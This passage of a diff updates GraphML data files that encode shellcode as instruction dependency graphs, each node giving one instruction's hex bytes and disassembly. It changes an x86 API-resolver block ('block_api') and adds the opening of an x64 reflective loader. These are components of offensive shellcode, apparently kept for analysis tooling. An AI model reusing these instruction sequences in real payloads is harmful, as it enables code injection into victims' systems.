         <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1043"/>
+        <edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1046"/>
+        <edge source="block.0x103d:instruction.0x103f" target="block.0x103d:instruction.0x1040"/>
+        <edge source="block.0x103d:instruction.0x103f" target="block.0x103d:instruction.0x1043"/>
         <edge source="block.0x103d:instruction.0x1043" target="block.0x103d:instruction.0x1046"/>
       </graph>
     </node>
-    <node id="block.0x1045">
-      <data key="address">0x1045</data>
+    <node id="block.0x1048">
+      <data key="address">0x1048</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1045</data>
+        <data key="address">0x1048</data>
         <data key="type">instructions</data>
-        <node id="block.0x1045:instruction.0x1045">
-          <data key="address">0x1045</data>
+        <node id="block.0x1048:instruction.0x1048">
+          <data key="address">0x1048</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c9</data>
           <data key="instruction.source">test ecx, ecx</data>
@@ -292,14 +303,14 @@
         <edge source="block.0x1048:instruction.0x1048" target="block.0x1048:instruction.0x104a"/>
       </graph>
     </node>
-    <node id="block.0x1049">
-      <data key="address">0x1049</data>
+    <node id="block.0x104c">
+      <data key="address">0x104c</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1049</data>
+        <data key="address">0x104c</data>
         <data key="type">instructions</data>
-        <node id="block.0x1049:instruction.0x1049">
-          <data key="address">0x1049</data>
+        <node id="block.0x104c:instruction.0x104c">
+          <data key="address">0x104c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">49</data>
           <data key="instruction.source">dec ecx</data>
@@ -322,19 +333,19 @@
           <data key="instruction.hex">8b7df8</data>
           <data key="instruction.source">mov edi, dword ptr [ebp - 8]</data>
         </node>
-        <edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x1050"/>
         <edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x104d"/>
+        <edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x1050"/>
         <edge source="block.0x104c:instruction.0x104d" target="block.0x104c:instruction.0x1050"/>
       </graph>
     </node>
-    <node id="block.0x1051">
-      <data key="address">0x1051</data>
+    <node id="block.0x1055">
+      <data key="address">0x1055</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1051</data>
+        <data key="address">0x1055</data>
         <data key="type">instructions</data>
-        <node id="block.0x1051:instruction.0x1051">
-          <data key="address">0x1051</data>
+        <node id="block.0x1055:instruction.0x1055">
+          <data key="address">0x1055</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">31c0</data>
           <data key="instruction.source">xor eax, eax</data>
@@ -379,20 +390,14 @@
         <edge source="block.0x1055:instruction.0x105d" target="block.0x1055:instruction.0x105f"/>
       </graph>
     </node>
-    <node id="block.0x105d">
-      <data key="address">0x105d</data>
+    <node id="block.0x1061">
+      <data key="address">0x1061</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x105d</data>
+        <data key="address">0x1061</data>
         <data key="type">instructions</data>
-        <node id="block.0x105d:instruction.0x105d">
-          <data key="address">0x105d</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">037df8</data>
-          <data key="instruction.source">add edi, dword ptr [ebp - 8]</data>
-        </node>
-        <node id="block.0x105d:instruction.0x1060">
-          <data key="address">0x1060</data>
+        <node id="block.0x1061:instruction.0x1061">
+          <data key="address">0x1061</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3b7d24</data>
           <data key="instruction.source">cmp edi, dword ptr [ebp + 0x24]</data>
@@ -406,14 +411,14 @@
         <edge source="block.0x1061:instruction.0x1061" target="block.0x1061:instruction.0x1064"/>
       </graph>
     </node>
-    <node id="block.0x1065">
-      <data key="address">0x1065</data>
+    <node id="block.0x1066">
+      <data key="address">0x1066</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1065</data>
+        <data key="address">0x1066</data>
         <data key="type">instructions</data>
-        <node id="block.0x1065:instruction.0x1065">
-          <data key="address">0x1065</data>
+        <node id="block.0x1066:instruction.0x1066">
+          <data key="address">0x1066</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">58</data>
           <data key="instruction.source">pop eax</data>
@@ -508,52 +513,46 @@
           <data key="instruction.hex">ffe0</data>
           <data key="instruction.source">jmp eax</data>
         </node>
-        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x107d"/>
-        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1066"/>
-        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x106f"/>
-        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1079"/>
-        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1074"/>
-        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1069"/>
-        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106f"/>
-        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106b"/>
-        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x1074"/>
-        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x106f"/>
-        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1074"/>
-        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1072"/>
-        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107d"/>
-        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x1074"/>
-        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107d"/>
-        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x1077"/>
-        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x1079"/>
-        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107d"/>
-        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x107d" target="block.0x1065:instruction.0x107e"/>
-        <edge source="block.0x1065:instruction.0x107e" target="block.0x1065:instruction.0x107f"/>
-        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1080"/>
-        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1083"/>
-        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1081"/>
-        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1082"/>
-        <edge source="block.0x1065:instruction.0x1081" target="block.0x1065:instruction.0x1082"/>
-        <edge source="block.0x1065:instruction.0x1082" target="block.0x1065:instruction.0x1083"/>
-      </graph>
-    </node>
-    <node id="block.0x1085">
-      <data key="address">0x1085</data>
-      <data key="type">instructions-graph</data>
-      <graph edgedefault="directed">
-        <data key="address">0x1085</data>
-        <data key="type">instructions</data>
-        <node id="block.0x1085:instruction.0x1085">
-          <data key="address">0x1085</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">58</data>
-          <data key="instruction.source">pop eax</data>
-        </node>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1067"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1070"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1075"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107a"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107e"/>
+        <edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x106a"/>
+        <edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x1075"/>
+        <edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x107a"/>
+        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x106c"/>
+        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1070"/>
+        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1073"/>
+        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1070"/>
+        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1075"/>
+        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x107a"/>
+        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1073"/>
+        <edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1075"/>
+        <edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x107a"/>
+        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1075"/>
+        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1078"/>
+        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x107e"/>
+        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1078"/>
+        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x107a"/>
+        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x107e"/>
+        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x107a"/>
+        <edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x107e"/>
+        <edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x107e" target="block.0x1066:instruction.0x107f"/>
+        <edge source="block.0x1066:instruction.0x107f" target="block.0x1066:instruction.0x1080"/>
+        <edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1081"/>
+        <edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1082"/>
+        <edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1084"/>
+        <edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1082"/>
+        <edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1083"/>
+        <edge source="block.0x1066:instruction.0x1082" target="block.0x1066:instruction.0x1083"/>
+        <edge source="block.0x1066:instruction.0x1083" target="block.0x1066:instruction.0x1084"/>
       </graph>
     </node>
     <node id="block.0x1086">
@@ -572,10 +571,10 @@
     </node>
     <node id="block.0x1087">
       <data key="address">0x1087</data>
-      <data key="type">block</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
         <data key="address">0x1087</data>
-        <data key="type">block</data>
+        <data key="type">instructions</data>
         <node id="block.0x1087:instruction.0x1087">
           <data key="address">0x1087</data>
           <data key="type">instruction</data>

--- a/data/shellcode/block_api.x86.graphml
+++ b/data/shellcode/block_api.x86.graphml
@@ -7,10 +7,10 @@
   <graph edgedefault="directed">
     <node id="block.0x1000">
       <data key="address">0x1000</data>
-      <data key="type">block</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
         <data key="address">0x1000</data>
-        <data key="type">block</data>
+        <data key="type">instructions</data>
         <node id="block.0x1000:instruction.0x1000">
           <data key="address">0x1000</data>
           <data key="type">instruction</data>
@@ -56,10 +56,10 @@
     </node>
     <node id="block.0x100f">
       <data key="address">0x100f</data>
-      <data key="type">block</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
         <data key="address">0x100f</data>
-        <data key="type">block</data>
+        <data key="type">instructions</data>
         <node id="block.0x100f:instruction.0x100f">
           <data key="address">0x100f</data>
           <data key="type">instruction</data>
@@ -80,14 +80,14 @@
         </node>
       </graph>
     </node>
-    <node id="block.0x101b">
-      <data key="address">0x101b</data>
-      <data key="type">block</data>
+    <node id="block.0x1018">
+      <data key="address">0x1018</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x101b</data>
-        <data key="type">block</data>
-        <node id="block.0x101b:instruction.0x101b">
-          <data key="address">0x101b</data>
+        <data key="address">0x1018</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1018:instruction.0x1018">
+          <data key="address">0x1018</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">31c0</data>
           <data key="instruction.source">xor eax, eax</data>
@@ -115,28 +115,28 @@
         <edge source="block.0x101b:instruction.0x101e" target="block.0x101b:instruction.0x1020"/>
       </graph>
     </node>
-    <node id="block.0x1022">
-      <data key="address">0x1022</data>
-      <data key="type">block</data>
+    <node id="block.0x101f">
+      <data key="address">0x101f</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1022</data>
-        <data key="type">block</data>
-        <node id="block.0x1022:instruction.0x1022">
-          <data key="address">0x1022</data>
+        <data key="address">0x101f</data>
+        <data key="type">instructions</data>
+        <node id="block.0x101f:instruction.0x101f">
+          <data key="address">0x101f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">2c20</data>
           <data key="instruction.source">sub al, 0x20</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1024">
-      <data key="address">0x1024</data>
-      <data key="type">block</data>
+    <node id="block.0x1021">
+      <data key="address">0x1021</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1024</data>
-        <data key="type">block</data>
-        <node id="block.0x1024:instruction.0x1024">
-          <data key="address">0x1024</data>
+        <data key="address">0x1021</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1021:instruction.0x1021">
+          <data key="address">0x1021</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1cf0d</data>
           <data key="instruction.source">ror edi, 0xd</data>
@@ -164,14 +164,14 @@
         <edge source="block.0x1024:instruction.0x1029" target="block.0x1024:instruction.0x102a"/>
       </graph>
     </node>
-    <node id="block.0x102c">
-      <data key="address">0x102c</data>
-      <data key="type">block</data>
+    <node id="block.0x1029">
+      <data key="address">0x1029</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x102c</data>
-        <data key="type">block</data>
-        <node id="block.0x102c:instruction.0x102c">
-          <data key="address">0x102c</data>
+        <data key="address">0x1029</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1029:instruction.0x1029">
+          <data key="address">0x1029</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">52</data>
           <data key="instruction.source">push edx</data>
@@ -229,14 +229,14 @@
         <edge source="block.0x102c:instruction.0x1039" target="block.0x102c:instruction.0x103b"/>
       </graph>
     </node>
-    <node id="block.0x103d">
-      <data key="address">0x103d</data>
-      <data key="type">block</data>
+    <node id="block.0x103a">
+      <data key="address">0x103a</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x103d</data>
-        <data key="type">block</data>
-        <node id="block.0x103d:instruction.0x103d">
-          <data key="address">0x103d</data>
+        <data key="address">0x103a</data>
+        <data key="type">instructions</data>
+        <node id="block.0x103a:instruction.0x103a">
+          <data key="address">0x103a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d0</data>
           <data key="instruction.source">add eax, edx</data>
@@ -271,14 +271,14 @@
         <edge source="block.0x103d:instruction.0x1043" target="block.0x103d:instruction.0x1046"/>
       </graph>
     </node>
-    <node id="block.0x1048">
-      <data key="address">0x1048</data>
-      <data key="type">block</data>
+    <node id="block.0x1045">
+      <data key="address">0x1045</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1048</data>
-        <data key="type">block</data>
-        <node id="block.0x1048:instruction.0x1048">
-          <data key="address">0x1048</data>
+        <data key="address">0x1045</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1045:instruction.0x1045">
+          <data key="address">0x1045</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c9</data>
           <data key="instruction.source">test ecx, ecx</data>
@@ -292,14 +292,14 @@
         <edge source="block.0x1048:instruction.0x1048" target="block.0x1048:instruction.0x104a"/>
       </graph>
     </node>
-    <node id="block.0x104c">
-      <data key="address">0x104c</data>
-      <data key="type">block</data>
+    <node id="block.0x1049">
+      <data key="address">0x1049</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x104c</data>
-        <data key="type">block</data>
-        <node id="block.0x104c:instruction.0x104c">
-          <data key="address">0x104c</data>
+        <data key="address">0x1049</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1049:instruction.0x1049">
+          <data key="address">0x1049</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">49</data>
           <data key="instruction.source">dec ecx</data>
@@ -327,14 +327,14 @@
         <edge source="block.0x104c:instruction.0x104d" target="block.0x104c:instruction.0x1050"/>
       </graph>
     </node>
-    <node id="block.0x1055">
-      <data key="address">0x1055</data>
-      <data key="type">block</data>
+    <node id="block.0x1051">
+      <data key="address">0x1051</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1055</data>
-        <data key="type">block</data>
-        <node id="block.0x1055:instruction.0x1055">
-          <data key="address">0x1055</data>
+        <data key="address">0x1051</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1051:instruction.0x1051">
+          <data key="address">0x1051</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">31c0</data>
           <data key="instruction.source">xor eax, eax</data>
@@ -379,14 +379,20 @@
         <edge source="block.0x1055:instruction.0x105d" target="block.0x1055:instruction.0x105f"/>
       </graph>
     </node>
-    <node id="block.0x1061">
-      <data key="address">0x1061</data>
-      <data key="type">block</data>
+    <node id="block.0x105d">
+      <data key="address">0x105d</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1061</data>
-        <data key="type">block</data>
-        <node id="block.0x1061:instruction.0x1061">
-          <data key="address">0x1061</data>
+        <data key="address">0x105d</data>
+        <data key="type">instructions</data>
+        <node id="block.0x105d:instruction.0x105d">
+          <data key="address">0x105d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">037df8</data>
+          <data key="instruction.source">add edi, dword ptr [ebp - 8]</data>
+        </node>
+        <node id="block.0x105d:instruction.0x1060">
+          <data key="address">0x1060</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3b7d24</data>
           <data key="instruction.source">cmp edi, dword ptr [ebp + 0x24]</data>
@@ -400,14 +406,14 @@
         <edge source="block.0x1061:instruction.0x1061" target="block.0x1061:instruction.0x1064"/>
       </graph>
     </node>
-    <node id="block.0x1066">
-      <data key="address">0x1066</data>
-      <data key="type">block</data>
+    <node id="block.0x1065">
+      <data key="address">0x1065</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1066</data>
-        <data key="type">block</data>
-        <node id="block.0x1066:instruction.0x1066">
-          <data key="address">0x1066</data>
+        <data key="address">0x1065</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1065:instruction.0x1065">
+          <data key="address">0x1065</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">58</data>
           <data key="instruction.source">pop eax</data>
@@ -502,46 +508,60 @@
           <data key="instruction.hex">ffe0</data>
           <data key="instruction.source">jmp eax</data>
         </node>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107e"/>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1067"/>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1070"/>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107a"/>
-        <edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x1075"/>
-        <edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x106a"/>
-        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1070"/>
-        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x106c"/>
-        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1075"/>
-        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1070"/>
-        <edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1075"/>
-        <edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1073"/>
-        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x107e"/>
-        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1075"/>
-        <edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x107e"/>
-        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1078"/>
-        <edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x107a"/>
-        <edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x107e"/>
-        <edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x107e" target="block.0x1066:instruction.0x107f"/>
-        <edge source="block.0x1066:instruction.0x107f" target="block.0x1066:instruction.0x1080"/>
-        <edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1081"/>
-        <edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1084"/>
-        <edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1082"/>
-        <edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1083"/>
-        <edge source="block.0x1066:instruction.0x1082" target="block.0x1066:instruction.0x1083"/>
-        <edge source="block.0x1066:instruction.0x1083" target="block.0x1066:instruction.0x1084"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1066"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x106f"/>
+        <edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1079"/>
+        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1069"/>
+        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106f"/>
+        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106b"/>
+        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x106f"/>
+        <edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1072"/>
+        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x1074"/>
+        <edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x1077"/>
+        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x1079"/>
+        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107d"/>
+        <edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x107d" target="block.0x1065:instruction.0x107e"/>
+        <edge source="block.0x1065:instruction.0x107e" target="block.0x1065:instruction.0x107f"/>
+        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1080"/>
+        <edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1083"/>
+        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1081"/>
+        <edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1082"/>
+        <edge source="block.0x1065:instruction.0x1081" target="block.0x1065:instruction.0x1082"/>
+        <edge source="block.0x1065:instruction.0x1082" target="block.0x1065:instruction.0x1083"/>
+      </graph>
+    </node>
+    <node id="block.0x1085">
+      <data key="address">0x1085</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1085</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1085:instruction.0x1085">
+          <data key="address">0x1085</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">58</data>
+          <data key="instruction.source">pop eax</data>
+        </node>
       </graph>
     </node>
     <node id="block.0x1086">
       <data key="address">0x1086</data>
-      <data key="type">block</data>
+      <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
         <data key="address">0x1086</data>
-        <data key="type">block</data>
+        <data key="type">instructions</data>
         <node id="block.0x1086:instruction.0x1086">
           <data key="address">0x1086</data>
           <data key="type">instruction</data>

--- a/data/shellcode/reflective_loader.x64.graphml
+++ b/data/shellcode/reflective_loader.x64.graphml
@@ -1,0 +1,3706 @@
+<?xml version="1.0" ?>
+<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:xsi="http://graphml.graphdrawing.org/xmlns" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd">
+  <key id="address" for="all" attr.name="address" attr.type="long"/>
+  <key id="type" for="all" attr.name="type" attr.type="string"/>
+  <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
+  <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
+  <key id="data.hex" for="node" attr.name="data.hex" attr.type="string"/>
+  <graph edgedefault="directed">
+    <node id="block.0x1000">
+      <data key="address">0x1000</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1000</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1000:instruction.0x1000">
+          <data key="address">0x1000</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">55</data>
+          <data key="instruction.source">push rbp</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1001">
+          <data key="address">0x1001</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4889e5</data>
+          <data key="instruction.source">mov rbp, rsp</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1004">
+          <data key="address">0x1004</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4881eca0000000</data>
+          <data key="instruction.source">sub rsp, 0xa0</data>
+        </node>
+        <node id="block.0x1000:instruction.0x100b">
+          <data key="address">0x100b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883e4f0</data>
+          <data key="instruction.source">and rsp, 0xfffffffffffffff0</data>
+        </node>
+        <node id="block.0x1000:instruction.0x100f">
+          <data key="address">0x100f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">53</data>
+          <data key="instruction.source">push rbx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1010">
+          <data key="address">0x1010</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">56</data>
+          <data key="instruction.source">push rsi</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1011">
+          <data key="address">0x1011</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">57</data>
+          <data key="instruction.source">push rdi</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1012">
+          <data key="address">0x1012</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4154</data>
+          <data key="instruction.source">push r12</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1014">
+          <data key="address">0x1014</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4155</data>
+          <data key="instruction.source">push r13</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1016">
+          <data key="address">0x1016</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4156</data>
+          <data key="instruction.source">push r14</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1018">
+          <data key="address">0x1018</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4157</data>
+          <data key="instruction.source">push r15</data>
+        </node>
+        <node id="block.0x1000:instruction.0x101a">
+          <data key="address">0x101a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4831c0</data>
+          <data key="instruction.source">xor rax, rax</data>
+        </node>
+        <node id="block.0x1000:instruction.0x101d">
+          <data key="address">0x101d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488945f8</data>
